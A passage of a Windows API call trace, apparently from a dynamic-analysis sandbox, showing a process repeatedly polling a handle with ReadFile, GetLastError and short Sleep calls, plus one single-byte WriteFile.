	[0205.188] ReadFile (in: hFile=0x258, lpBuffer=0x116f8f4, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x116f4d8, lpOverlapped=0x0 | out: lpBuffer=0x116f8f4, lpNumberOfBytesRead=0x116f4d8*=0x0, lpOverlapped=0x0) returned 0
	[0205.188] GetLastError () returned 0x218
	[0205.188] Sleep (dwMilliseconds=0xa) 
	[0205.203] ReadFile (in: hFile=0x258, lpBuffer=0x116f8f4, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x116f4d8, lpOverlapped=0x0 | out: lpBuffer=0x116f8f4, lpNumberOfBytesRead=0x116f4d8*=0x0, lpOverlapped=0x0) returned 0
	[0205.203] GetLastError () returned 0x218
	[0205.203] Sleep (dwMilliseconds=0xa) 
	[0205.219] ReadFile (in: hFile=0x258, lpBuffer=0x116f8f4, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x116f4d8, lpOverlapped=0x0 | out: lpBuffer=0x116f8f4, lpNumberOfBytesRead=0x116f4d8*=0x0, lpOverlapped=0x0) returned 0
	[0205.219] GetLastError () returned 0x218
	[0205.219] Sleep (dwMilliseconds=0xa) 
	[0205.245] ReadFile (in: hFile=0x258, lpBuffer=0x116f8f4, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x116f4d8, lpOverlapped=0x0 | out: lpBuffer=0x116f8f4, lpNumberOfBytesRead=0x116f4d8*=0x0, lpOverlapped=0x0) returned 0
	[0205.245] GetLastError () returned 0x218
	[0205.245] Sleep (dwMilliseconds=0xa) 
	[0205.250] ReadFile (in: hFile=0x258, lpBuffer=0x116f8f4, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x116f4d8, lpOverlapped=0x0 | out: lpBuffer=0x116f8f4, lpNumberOfBytesRead=0x116f4d8*=0x0, lpOverlapped=0x0) returned 0
	[0205.250] GetLastError () returned 0x218
	[0205.250] Sleep (dwMilliseconds=0xa) 
	[0205.297] ReadFile (in: hFile=0x258, lpBuffer=0x116f8f4, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x116f4d8, lpOverlapped=0x0 | out: lpBuffer=0x116f8f4, lpNumberOfBytesRead=0x116f4d8*=0x0, lpOverlapped=0x0) returned 0
	[0205.297] GetLastError () returned 0x218
	[0205.297] Sleep (dwMilliseconds=0xa) 
	[0205.344] ReadFile (in: hFile=0x258, lpBuffer=0x116f8f4, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x116f4d8, lpOverlapped=0x0 | out: lpBuffer=0x116f8f4, lpNumberOfBytesRead=0x116f4d8*=0x0, lpOverlapped=0x0) returned 0
	[0205.344] GetLastError () returned 0x218
	[0205.344] Sleep (dwMilliseconds=0xa) 
	[0205.359] ReadFile (in: hFile=0x258, lpBuffer=0x116f8f4, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x116f4d8, lpOverlapped=0x0 | out: lpBuffer=0x116f8f4, lpNumberOfBytesRead=0x116f4d8*=0x0, lpOverlapped=0x0) returned 0
	[0205.359] GetLastError () returned 0x218
	[0205.359] Sleep (dwMilliseconds=0xa) 
	[0205.375] ReadFile (in: hFile=0x258, lpBuffer=0x116f8f4, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x116f4d8, lpOverlapped=0x0 | out: lpBuffer=0x116f8f4, lpNumberOfBytesRead=0x116f4d8*=0x0, lpOverlapped=0x0) returned 0
	[0205.375] GetLastError () returned 0x218
	[0205.375] Sleep (dwMilliseconds=0xa) 
	[0205.390] ReadFile (in: hFile=0x258, lpBuffer=0x116f8f4, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x116f4d8, lpOverlapped=0x0 | out: lpBuffer=0x116f8f4, lpNumberOfBytesRead=0x116f4d8*=0x0, lpOverlapped=0x0) returned 0
	[0205.390] GetLastError () returned 0x218
	[0205.390] Sleep (dwMilliseconds=0xa) 
	[0205.406] ReadFile (in: hFile=0x258, lpBuffer=0x116f8f4, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x116f4d8, lpOverlapped=0x0 | out: lpBuffer=0x116f8f4, lpNumberOfBytesRead=0x116f4d8*=0x0, lpOverlapped=0x0) returned 0
	[0205.406] GetLastError () returned 0x218
	[0205.407] Sleep (dwMilliseconds=0xa) 
	[0205.421] ReadFile (in: hFile=0x258, lpBuffer=0x116f8f4, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x116f4d8, lpOverlapped=0x0 | out: lpBuffer=0x116f8f4, lpNumberOfBytesRead=0x116f4d8*=0x0, lpOverlapped=0x0) returned 0
	[0205.421] GetLastError () returned 0x218
	[0205.422] Sleep (dwMilliseconds=0xa) 
	[0205.437] ReadFile (in: hFile=0x258, lpBuffer=0x116f8f4, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x116f4d8, lpOverlapped=0x0 | out: lpBuffer=0x116f8f4, lpNumberOfBytesRead=0x116f4d8*=0x0, lpOverlapped=0x0) returned 0
	[0205.437] GetLastError () returned 0x218
	[0205.437] Sleep (dwMilliseconds=0xa) 
	[0205.453] ReadFile (in: hFile=0x258, lpBuffer=0x116f8f4, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x116f4d8, lpOverlapped=0x0 | out: lpBuffer=0x116f8f4, lpNumberOfBytesRead=0x116f4d8*=0x0, lpOverlapped=0x0) returned 0
	[0205.453] GetLastError () returned 0x218
	[0205.453] Sleep (dwMilliseconds=0xa) 
	[0205.502] ReadFile (in: hFile=0x258, lpBuffer=0x116f8f4, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x116f4d8, lpOverlapped=0x0 | out: lpBuffer=0x116f8f4, lpNumberOfBytesRead=0x116f4d8*=0x0, lpOverlapped=0x0) returned 0
	[0205.502] GetLastError () returned 0x218
	[0205.502] Sleep (dwMilliseconds=0xa) 
	[0205.546] ReadFile (in: hFile=0x258, lpBuffer=0x116f8f4, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x116f4d8, lpOverlapped=0x0 | out: lpBuffer=0x116f8f4, lpNumberOfBytesRead=0x116f4d8*=0x0, lpOverlapped=0x0) returned 0
	[0205.546] GetLastError () returned 0x218
	[0205.546] Sleep (dwMilliseconds=0xa) 
	[0205.569] ReadFile (in: hFile=0x258, lpBuffer=0x116f8f4, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x116f4d8, lpOverlapped=0x0 | out: lpBuffer=0x116f8f4, lpNumberOfBytesRead=0x116f4d8*=0x0, lpOverlapped=0x0) returned 0
	[0205.570] GetLastError () returned 0x218
	[0205.570] Sleep (dwMilliseconds=0xa) 
	[0205.577] ReadFile (in: hFile=0x258, lpBuffer=0x116f8f4, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x116f4d8, lpOverlapped=0x0 | out: lpBuffer=0x116f8f4, lpNumberOfBytesRead=0x116f4d8*=0x0, lpOverlapped=0x0) returned 0
	[0205.577] GetLastError () returned 0x218
	[0205.577] Sleep (dwMilliseconds=0xa) 
	[0205.593] ReadFile (in: hFile=0x258, lpBuffer=0x116f8f4, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x116f4d8, lpOverlapped=0x0 | out: lpBuffer=0x116f8f4, lpNumberOfBytesRead=0x116f4d8*=0x0, lpOverlapped=0x0) returned 0
	[0205.593] GetLastError () returned 0x218
	[0205.593] Sleep (dwMilliseconds=0xa) 
	[0205.622] ReadFile (in: hFile=0x258, lpBuffer=0x116f8f4, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x116f4d8, lpOverlapped=0x0 | out: lpBuffer=0x116f8f4, lpNumberOfBytesRead=0x116f4d8*=0x0, lpOverlapped=0x0) returned 0
	[0205.622] GetLastError () returned 0x218
	[0205.623] Sleep (dwMilliseconds=0xa) 
	[0205.628] ReadFile (in: hFile=0x258, lpBuffer=0x116f8f4, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x116f4d8, lpOverlapped=0x0 | out: lpBuffer=0x116f8f4, lpNumberOfBytesRead=0x116f4d8*=0x0, lpOverlapped=0x0) returned 0
	[0205.628] GetLastError () returned 0x218
	[0205.628] Sleep (dwMilliseconds=0xa) 
	[0205.641] ReadFile (in: hFile=0x258, lpBuffer=0x116f8f4, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x116f4d8, lpOverlapped=0x0 | out: lpBuffer=0x116f8f4, lpNumberOfBytesRead=0x116f4d8*=0x0, lpOverlapped=0x0) returned 0
	[0205.641] GetLastError () returned 0x218
	[0205.641] Sleep (dwMilliseconds=0xa) 
	[0205.656] ReadFile (in: hFile=0x258, lpBuffer=0x116f8f4, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x116f4d8, lpOverlapped=0x0 | out: lpBuffer=0x116f8f4, lpNumberOfBytesRead=0x116f4d8*=0x0, lpOverlapped=0x0) returned 0
	[0205.656] GetLastError () returned 0x218
	[0205.656] Sleep (dwMilliseconds=0xa) 
	[0205.671] ReadFile (in: hFile=0x258, lpBuffer=0x116f8f4, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x116f4d8, lpOverlapped=0x0 | out: lpBuffer=0x116f8f4, lpNumberOfBytesRead=0x116f4d8*=0x0, lpOverlapped=0x0) returned 0
	[0205.671] GetLastError () returned 0x218
	[0205.671] Sleep (dwMilliseconds=0xa) 
	[0205.720] ReadFile (in: hFile=0x258, lpBuffer=0x116f8f4, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x116f4d8, lpOverlapped=0x0 | out: lpBuffer=0x116f8f4, lpNumberOfBytesRead=0x116f4d8*=0x0, lpOverlapped=0x0) returned 0
	[0205.720] GetLastError () returned 0x218
	[0205.720] Sleep (dwMilliseconds=0xa) 
	[0205.765] ReadFile (in: hFile=0x258, lpBuffer=0x116f8f4, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x116f4d8, lpOverlapped=0x0 | out: lpBuffer=0x116f8f4, lpNumberOfBytesRead=0x116f4d8*=0x0, lpOverlapped=0x0) returned 0
	[0205.765] GetLastError () returned 0x218
	[0205.765] Sleep (dwMilliseconds=0xa) 
	[0205.783] ReadFile (in: hFile=0x258, lpBuffer=0x116f8f4, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x116f4d8, lpOverlapped=0x0 | out: lpBuffer=0x116f8f4, lpNumberOfBytesRead=0x116f4d8*=0x0, lpOverlapped=0x0) returned 0
	[0205.783] GetLastError () returned 0x218
	[0205.784] Sleep (dwMilliseconds=0xa) 
	[0205.796] ReadFile (in: hFile=0x258, lpBuffer=0x116f8f4, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x116f4d8, lpOverlapped=0x0 | out: lpBuffer=0x116f8f4, lpNumberOfBytesRead=0x116f4d8*=0x0, lpOverlapped=0x0) returned 0
	[0205.796] GetLastError () returned 0x218
	[0205.796] Sleep (dwMilliseconds=0xa) 
	[0205.811] ReadFile (in: hFile=0x258, lpBuffer=0x116f8f4, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x116f4d8, lpOverlapped=0x0 | out: lpBuffer=0x116f8f4, lpNumberOfBytesRead=0x116f4d8*=0x0, lpOverlapped=0x0) returned 0
	[0205.811] GetLastError () returned 0x218
	[0205.812] Sleep (dwMilliseconds=0xa) 
	[0205.827] ReadFile (in: hFile=0x258, lpBuffer=0x116f8f4, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x116f4d8, lpOverlapped=0x0 | out: lpBuffer=0x116f8f4, lpNumberOfBytesRead=0x116f4d8*=0x0, lpOverlapped=0x0) returned 0
	[0205.827] GetLastError () returned 0x218
	[0205.828] Sleep (dwMilliseconds=0xa) 
	[0205.843] ReadFile (in: hFile=0x258, lpBuffer=0x116f8f4, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x116f4d8, lpOverlapped=0x0 | out: lpBuffer=0x116f8f4, lpNumberOfBytesRead=0x116f4d8*=0x0, lpOverlapped=0x0) returned 0
	[0205.843] GetLastError () returned 0x218
	[0205.843] Sleep (dwMilliseconds=0xa) 
	[0205.858] ReadFile (in: hFile=0x258, lpBuffer=0x116f8f4, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x116f4d8, lpOverlapped=0x0 | out: lpBuffer=0x116f8f4, lpNumberOfBytesRead=0x116f4d8*=0x0, lpOverlapped=0x0) returned 0
	[0205.858] GetLastError () returned 0x218
	[0205.858] Sleep (dwMilliseconds=0xa) 
	[0205.874] ReadFile (in: hFile=0x258, lpBuffer=0x116f8f4, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x116f4d8, lpOverlapped=0x0 | out: lpBuffer=0x116f8f4, lpNumberOfBytesRead=0x116f4d8*=0x0, lpOverlapped=0x0) returned 0
	[0205.874] GetLastError () returned 0x218
	[0205.874] Sleep (dwMilliseconds=0xa) 
	[0205.890] ReadFile (in: hFile=0x258, lpBuffer=0x116f8f4, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x116f4d8, lpOverlapped=0x0 | out: lpBuffer=0x116f8f4, lpNumberOfBytesRead=0x116f4d8*=0x0, lpOverlapped=0x0) returned 0
	[0205.890] GetLastError () returned 0x218
	[0205.890] Sleep (dwMilliseconds=0xa) 
	[0205.939] ReadFile (in: hFile=0x258, lpBuffer=0x116f8f4, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x116f4d8, lpOverlapped=0x0 | out: lpBuffer=0x116f8f4, lpNumberOfBytesRead=0x116f4d8*=0x0, lpOverlapped=0x0) returned 0
	[0205.939] GetLastError () returned 0x218
	[0205.939] Sleep (dwMilliseconds=0xa) 
	[0205.983] ReadFile (in: hFile=0x258, lpBuffer=0x116f8f4, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x116f4d8, lpOverlapped=0x0 | out: lpBuffer=0x116f8f4, lpNumberOfBytesRead=0x116f4d8*=0x0, lpOverlapped=0x0) returned 0
	[0205.983] GetLastError () returned 0x218
	[0205.983] Sleep (dwMilliseconds=0xa) 
	[0206.005] ReadFile (in: hFile=0x258, lpBuffer=0x116f8f4, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x116f4d8, lpOverlapped=0x0 | out: lpBuffer=0x116f8f4, lpNumberOfBytesRead=0x116f4d8*=0x0, lpOverlapped=0x0) returned 0
	[0206.005] GetLastError () returned 0x218
	[0206.005] Sleep (dwMilliseconds=0xa) 
	[0206.054] ReadFile (in: hFile=0x258, lpBuffer=0x116f8f4, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x116f4d8, lpOverlapped=0x0 | out: lpBuffer=0x116f8f4, lpNumberOfBytesRead=0x116f4d8*=0x0, lpOverlapped=0x0) returned 0
	[0206.054] GetLastError () returned 0x218
	[0206.054] Sleep (dwMilliseconds=0xa) 
	[0206.061] ReadFile (in: hFile=0x258, lpBuffer=0x116f8f4, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x116f4d8, lpOverlapped=0x0 | out: lpBuffer=0x116f8f4, lpNumberOfBytesRead=0x116f4d8*=0x0, lpOverlapped=0x0) returned 0
	[0206.061] GetLastError () returned 0x218
	[0206.061] Sleep (dwMilliseconds=0xa) 
	[0206.077] ReadFile (in: hFile=0x258, lpBuffer=0x116f8f4, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x116f4d8, lpOverlapped=0x0 | out: lpBuffer=0x116f8f4, lpNumberOfBytesRead=0x116f4d8*=0x0, lpOverlapped=0x0) returned 0
	[0206.077] GetLastError () returned 0x218
	[0206.077] Sleep (dwMilliseconds=0xa) 
	[0206.092] ReadFile (in: hFile=0x258, lpBuffer=0x116f8f4, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x116f4d8, lpOverlapped=0x0 | out: lpBuffer=0x116f8f4, lpNumberOfBytesRead=0x116f4d8*=0x0, lpOverlapped=0x0) returned 0
	[0206.092] GetLastError () returned 0x218
	[0206.092] Sleep (dwMilliseconds=0xa) 
	[0206.108] ReadFile (in: hFile=0x258, lpBuffer=0x116f8f4, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x116f4d8, lpOverlapped=0x0 | out: lpBuffer=0x116f8f4, lpNumberOfBytesRead=0x116f4d8*=0x0, lpOverlapped=0x0) returned 0
	[0206.108] GetLastError () returned 0x218
	[0206.108] Sleep (dwMilliseconds=0xa) 
	[0206.158] ReadFile (in: hFile=0x258, lpBuffer=0x116f8f4, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x116f4d8, lpOverlapped=0x0 | out: lpBuffer=0x116f8f4, lpNumberOfBytesRead=0x116f4d8*=0x0, lpOverlapped=0x0) returned 0
	[0206.158] GetLastError () returned 0x218
	[0206.158] Sleep (dwMilliseconds=0xa) 
	[0206.201] ReadFile (in: hFile=0x258, lpBuffer=0x116f8f4, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x116f4d8, lpOverlapped=0x0 | out: lpBuffer=0x116f8f4, lpNumberOfBytesRead=0x116f4d8*=0x0, lpOverlapped=0x0) returned 0
	[0206.201] GetLastError () returned 0x218
	[0206.201] Sleep (dwMilliseconds=0xa) 
	[0206.223] ReadFile (in: hFile=0x258, lpBuffer=0x116f8f4, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x116f4d8, lpOverlapped=0x0 | out: lpBuffer=0x116f8f4, lpNumberOfBytesRead=0x116f4d8*=0x0, lpOverlapped=0x0) returned 0
	[0206.223] GetLastError () returned 0x218
	[0206.223] Sleep (dwMilliseconds=0xa) 
	[0206.233] ReadFile (in: hFile=0x258, lpBuffer=0x116f8f4, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x116f4d8, lpOverlapped=0x0 | out: lpBuffer=0x116f8f4, lpNumberOfBytesRead=0x116f4d8*=0x0, lpOverlapped=0x0) returned 0
	[0206.233] GetLastError () returned 0x218
	[0206.233] Sleep (dwMilliseconds=0xa) 
	[0206.248] ReadFile (in: hFile=0x258, lpBuffer=0x116f8f4, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x116f4d8, lpOverlapped=0x0 | out: lpBuffer=0x116f8f4, lpNumberOfBytesRead=0x116f4d8*=0x0, lpOverlapped=0x0) returned 0
	[0206.248] GetLastError () returned 0x218
	[0206.248] Sleep (dwMilliseconds=0xa) 
	[0206.264] ReadFile (in: hFile=0x258, lpBuffer=0x116f8f4, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x116f4d8, lpOverlapped=0x0 | out: lpBuffer=0x116f8f4, lpNumberOfBytesRead=0x116f4d8*=0x0, lpOverlapped=0x0) returned 0
	[0206.264] GetLastError () returned 0x218
	[0206.264] Sleep (dwMilliseconds=0xa) 
	[0206.280] ReadFile (in: hFile=0x258, lpBuffer=0x116f8f4, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x116f4d8, lpOverlapped=0x0 | out: lpBuffer=0x116f8f4, lpNumberOfBytesRead=0x116f4d8*=0x0, lpOverlapped=0x0) returned 0
	[0206.280] GetLastError () returned 0x218
	[0206.280] Sleep (dwMilliseconds=0xa) 
	[0206.311] ReadFile (in: hFile=0x258, lpBuffer=0x116f8f4, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x116f4d8, lpOverlapped=0x0 | out: lpBuffer=0x116f8f4, lpNumberOfBytesRead=0x116f4d8*=0x0, lpOverlapped=0x0) returned 0
	[0206.311] GetLastError () returned 0x218
	[0206.311] Sleep (dwMilliseconds=0xa) 
	[0206.326] ReadFile (in: hFile=0x258, lpBuffer=0x116f8f4, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x116f4d8, lpOverlapped=0x0 | out: lpBuffer=0x116f8f4, lpNumberOfBytesRead=0x116f4d8*=0x0, lpOverlapped=0x0) returned 0
	[0206.326] GetLastError () returned 0x218
	[0206.326] Sleep (dwMilliseconds=0xa) 
	[0206.373] ReadFile (in: hFile=0x258, lpBuffer=0x116f8f4, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x116f4d8, lpOverlapped=0x0 | out: lpBuffer=0x116f8f4, lpNumberOfBytesRead=0x116f4d8*=0x0, lpOverlapped=0x0) returned 0
	[0206.373] GetLastError () returned 0x218
	[0206.373] Sleep (dwMilliseconds=0xa) 
	[0206.439] ReadFile (in: hFile=0x258, lpBuffer=0x116f8f4, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x116f4d8, lpOverlapped=0x0 | out: lpBuffer=0x116f8f4, lpNumberOfBytesRead=0x116f4d8*=0x0, lpOverlapped=0x0) returned 0
	[0206.439] GetLastError () returned 0x218
	[0206.439] Sleep (dwMilliseconds=0xa) 
	[0206.455] ReadFile (in: hFile=0x258, lpBuffer=0x116f8f4, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x116f4d8, lpOverlapped=0x0 | out: lpBuffer=0x116f8f4, lpNumberOfBytesRead=0x116f4d8*=0x0, lpOverlapped=0x0) returned 0
	[0206.455] GetLastError () returned 0x218
	[0206.455] Sleep (dwMilliseconds=0xa) 
	[0206.467] ReadFile (in: hFile=0x258, lpBuffer=0x116f8f4, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x116f4d8, lpOverlapped=0x0 | out: lpBuffer=0x116f8f4, lpNumberOfBytesRead=0x116f4d8*=0x0, lpOverlapped=0x0) returned 0
	[0206.467] GetLastError () returned 0x218
	[0206.468] Sleep (dwMilliseconds=0xa) 
	[0206.489] ReadFile (in: hFile=0x258, lpBuffer=0x116f8f4, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x116f4d8, lpOverlapped=0x0 | out: lpBuffer=0x116f8f4, lpNumberOfBytesRead=0x116f4d8*=0x0, lpOverlapped=0x0) returned 0
	[0206.489] GetLastError () returned 0x218
	[0206.489] Sleep (dwMilliseconds=0xa) 
	[0206.498] ReadFile (in: hFile=0x258, lpBuffer=0x116f8f4, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x116f4d8, lpOverlapped=0x0 | out: lpBuffer=0x116f8f4, lpNumberOfBytesRead=0x116f4d8*=0x0, lpOverlapped=0x0) returned 0
	[0206.498] GetLastError () returned 0x218
	[0206.498] Sleep (dwMilliseconds=0xa) 
	[0206.513] ReadFile (in: hFile=0x258, lpBuffer=0x116f8f4, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x116f4d8, lpOverlapped=0x0 | out: lpBuffer=0x116f8f4, lpNumberOfBytesRead=0x116f4d8*=0x0, lpOverlapped=0x0) returned 0
	[0206.513] GetLastError () returned 0x218
	[0206.514] Sleep (dwMilliseconds=0x3e8) 
	[0208.355] WriteFile (in: hFile=0x258, lpBuffer=0x116f4dc, nNumberOfBytesToWrite=0x1, lpNumberOfBytesWritten=0x116f4d4, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x116f4d4, lpOverlapped=0x0) returned 0
	[0208.355] Sleep (dwMilliseconds=0xa) 
	[0208.615] ReadFile (in: hFile=0x258, lpBuffer=0x116f8f4, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x116f4d8, lpOverlapped=0x0 | out: lpBuffer=0x116f8f4, lpNumberOfBytesRead=0x116f4d8*=0x0, lpOverlapped=0x0) returned 0
	[0208.615] GetLastError () returned 0x218
	[0208.615] Sleep (dwMilliseconds=0xa) 
	[0208.649] ReadFile (in: hFile=0x258, lpBuffer=0x116f8f4, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x116f4d8, lpOverlapped=0x0 | out: lpBuffer=0x116f8f4, lpNumberOfBytesRead=0x116f4d8*=0x0, lpOverlapped=0x0) returned 0
	[0208.649] GetLastError () returned 0x218
	[0208.649] Sleep (dwMilliseconds=0xa) 
	[0208.654] ReadFile (in: hFile=0x258, lpBuffer=0x116f8f4, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x116f4d8, lpOverlapped=0x0 | out: lpBuffer=0x116f8f4, lpNumberOfBytesRead=0x116f4d8*=0x0, lpOverlapped=0x0) returned 0
	[0208.655] GetLastError () returned 0x218
	[0208.656] Sleep (dwMilliseconds=0xa) 
	[0208.801] ReadFile (in: hFile=0x258, lpBuffer=0x116f8f4, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x116f4d8, lpOverlapped=0x0 | out: lpBuffer=0x116f8f4, lpNumberOfBytesRead=0x116f4d8*=0x0, lpOverlapped=0x0) returned 0
	[0208.801] GetLastError () returned 0x218
	[0208.801] Sleep (dwMilliseconds=0xa) 
	[0208.807] ReadFile (in: hFile=0x258, lpBuffer=0x116f8f4, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x116f4d8, lpOverlapped=0x0 | out: lpBuffer=0x116f8f4, lpNumberOfBytesRead=0x116f4d8*=0x0, lpOverlapped=0x0) returned 0
	[0208.807] GetLastError () returned 0x218
	[0208.807] Sleep (dwMilliseconds=0xa) 
	[0208.823] ReadFile (in: hFile=0x258, lpBuffer=0x116f8f4, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x116f4d8, lpOverlapped=0x0 | out: lpBuffer=0x116f8f4, lpNumberOfBytesRead=0x116f4d8*=0x0, lpOverlapped=0x0) returned 0
	[0208.823] GetLastError () returned 0x218
	[0208.823] Sleep (dwMilliseconds=0xa) 
	[0208.839] ReadFile (in: hFile=0x258, lpBuffer=0x116f8f4, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x116f4d8, lpOverlapped=0x0 | out: lpBuffer=0x116f8f4, lpNumberOfBytesRead=0x116f4d8*=0x0, lpOverlapped=0x0) returned 0
	[0208.839] GetLastError () returned 0x218
	[0208.839] Sleep (dwMilliseconds=0xa) 
	[0208.900] ReadFile (in: hFile=0x258, lpBuffer=0x116f8f4, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x116f4d8, lpOverlapped=0x0 | out: lpBuffer=0x116f8f4, lpNumberOfBytesRead=0x116f4d8*=0x0, lpOverlapped=0x0) returned 0
	[0208.900] GetLastError () returned 0x218
	[0208.901] Sleep (dwMilliseconds=0xa) 
	[0209.056] ReadFile (in: hFile=0x258, lpBuffer=0x116f8f4, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x116f4d8, lpOverlapped=0x0 | out: lpBuffer=0x116f8f4, lpNumberOfBytesRead=0x116f4d8*=0x0, lpOverlapped=0x0) returned 0
	[0209.056] GetLastError () returned 0x218
	[0209.056] Sleep (dwMilliseconds=0xa) 
	[0209.144] ReadFile (in: hFile=0x258, lpBuffer=0x116f8f4, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x116f4d8, lpOverlapped=0x0 | out: lpBuffer=0x116f8f4, lpNumberOfBytesRead=0x116f4d8*=0x0, lpOverlapped=0x0) returned 0
	[0209.144] GetLastError () returned 0x218
	[0209.144] Sleep (dwMilliseconds=0xa) 
	[0209.150] ReadFile (in: hFile=0x258, lpBuffer=0x116f8f4, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x116f4d8, lpOverlapped=0x0 | out: lpBuffer=0x116f8f4, lpNumberOfBytesRead=0x116f4d8*=0x0, lpOverlapped=0x0) returned 0
	[0209.150] GetLastError () returned 0x218
	[0209.150] Sleep (dwMilliseconds=0xa) 
	[0209.170] ReadFile (in: hFile=0x258, lpBuffer=0x116f8f4, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x116f4d8, lpOverlapped=0x0 | out: lpBuffer=0x116f8f4, lpNumberOfBytesRead=0x116f4d8*=0x0, lpOverlapped=0x0) returned 0
	[0209.170] GetLastError () returned 0x218
	[0209.170] Sleep (dwMilliseconds=0xa) 
	[0209.181] ReadFile (in: hFile=0x258, lpBuffer=0x116f8f4, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x116f4d8, lpOverlapped=0x0 | out: lpBuffer=0x116f8f4, lpNumberOfBytesRead=0x116f4d8*=0x0, lpOverlapped=0x0) returned 0
	[0209.181] GetLastError () returned 0x218
	[0209.181] Sleep (dwMilliseconds=0xa) 
	[0209.197] ReadFile (in: hFile=0x258, lpBuffer=0x116f8f4, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x116f4d8, lpOverlapped=0x0 | out: lpBuffer=0x116f8f4, lpNumberOfBytesRead=0x116f4d8*=0x0, lpOverlapped=0x0) returned 0
	[0209.197] GetLastError () returned 0x218
	[0209.197] Sleep (dwMilliseconds=0xa) 
	[0209.244] ReadFile (in: hFile=0x258, lpBuffer=0x116f8f4, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x116f4d8, lpOverlapped=0x0 | out: lpBuffer=0x116f8f4, lpNumberOfBytesRead=0x116f4d8*=0x0, lpOverlapped=0x0) returned 0
	[0209.244] GetLastError () returned 0x218
	[0209.244] Sleep (dwMilliseconds=0xa) 
	[0209.291] ReadFile (in: hFile=0x258, lpBuffer=0x116f8f4, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x116f4d8, lpOverlapped=0x0 | out: lpBuffer=0x116f8f4, lpNumberOfBytesRead=0x116f4d8*=0x0, lpOverlapped=0x0) returned 0
	[0209.291] GetLastError () returned 0x218
	[0209.291] Sleep (dwMilliseconds=0xa) 
	[0209.322] ReadFile (in: hFile=0x258, lpBuffer=0x116f8f4, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x116f4d8, lpOverlapped=0x0 | out: lpBuffer=0x116f8f4, lpNumberOfBytesRead=0x116f4d8*=0x0, lpOverlapped=0x0) returned 0
	[0209.322] GetLastError () returned 0x218
	[0209.322] Sleep (dwMilliseconds=0xa) 
